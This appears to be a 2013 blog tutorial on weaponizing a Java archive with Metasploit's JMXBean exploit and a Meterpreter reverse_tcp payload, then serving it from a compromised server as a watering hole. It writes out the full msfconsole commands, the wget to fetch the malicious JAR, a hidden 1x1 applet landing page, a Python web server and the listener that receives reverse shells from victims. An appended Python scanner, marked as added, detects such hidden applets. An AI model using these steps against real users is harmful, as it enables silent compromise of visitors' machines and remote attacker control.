Wednesday, November 20, 2013

Weaponizing a Java Archive file for offline use

In certain cases you may want to create a JAR file for offline use.  As an example, upon successful compromise of a Linux server, a "watering-hole" situation could be created by hosting a Java Meterpreter payloaded JAR file on the compromised system and pointing users to it.

In this case, the Java JMXBean 2 vulnerability which affects Java versions 1.7 and under will be leveraged.

Initialize Metasploit console 'msfconsole' and use:

use exploit/multi/browser/java_jre17_jmxbean_2


Set the payload (Java Meterpreter Reverse TCP):

set PAYLOAD java/meterpreter/reverse_tcp


Show and Set Options:

show options






The interest here is just to grab the JAR file from the Metasploit server, so set SRVHOST to 127.0.0.1.  However, keep in mind that the LHOST variable should be set to point to the IP that will actually host the Meterpreter listener.  In this example, I set the LHOST to 10.0.0.10.

set SRVHOST 127.0.0.1
set LHOST 10.0.0.10



Now start the listener:

exploit



Take note of the URI path, it's randomized and will be different than the above screenshot.   Create a 'wget' request and grab the weaponized JAR.

wget http://127.0.0.1:8080/TneGeXfpn2/Archive.jar



We can now use Python to create a simple web server to host the "watering-hole" landing page.  First, we create the 'index.html' file with embed code to invoke the JAR:

<html><head></head><body><applet archive="Archive.jar" code="Exploit.class" width="1" height="1"></applet></body></html>

Dump both the 'index.html' and 'Archive.jar' into a world readable directory.  From within that directory execute the Python command to launch the web server:

python -m SimpleHTTPServer 80

Don't forget to start your Metasploit listener on the machine you pointed the LHOST IP variable back to.

use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 10.0.0.10
exploit
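From the defender's side, the landing page above is easy to spot: a 1x1 applet pulling a JAR is a classic watering-hole tell. The following scanner is an added example, not part of the original post; it parses an HTML file, reports every applet that loads a JAR, flags the hidden 1x1 case, and (optionally, via the assumed 'webroot' argument) checks whether the referenced JAR actually sits in the served directory.

```python
import os
from html.parser import HTMLParser


class AppletCollector(HTMLParser):
    """Collect the attributes of every <applet> tag in a page."""

    def __init__(self):
        super().__init__()
        self.applets = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "applet":
            self.applets.append({name.lower(): value for name, value in attrs})


def _tiny(value):
    """True when a width/height attribute collapses the applet to 1px or less."""
    try:
        return float(value) <= 1
    except (TypeError, ValueError):
        return False


def find_jar_applets(html, webroot=None):
    """Return one finding per applet that loads a JAR via 'archive'.
    'hidden' marks the 1x1 trick; 'jar_present' is filled when webroot is given."""
    collector = AppletCollector()
    collector.feed(html)
    findings = []
    for applet in collector.applets:
        archive = applet.get("archive")
        if not archive or not archive.lower().endswith(".jar"):
            continue
        finding = {
            "archive": archive,
            "code": applet.get("code"),
            "hidden": _tiny(applet.get("width")) and _tiny(applet.get("height")),
        }
        if webroot is not None:  # assumed: the directory SimpleHTTPServer serves
            finding["jar_present"] = os.path.isfile(os.path.join(webroot, archive))
        findings.append(finding)
    return findings


# Constructed sample: the landing page shown in the post.
SAMPLE_PAGE = ('<html><head></head><body><applet archive="Archive.jar" '
               'code="Exploit.class" width="1" height="1"></applet></body></html>')

if __name__ == "__main__":
    for f in find_jar_applets(SAMPLE_PAGE, webroot="."):
        print(f)
```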


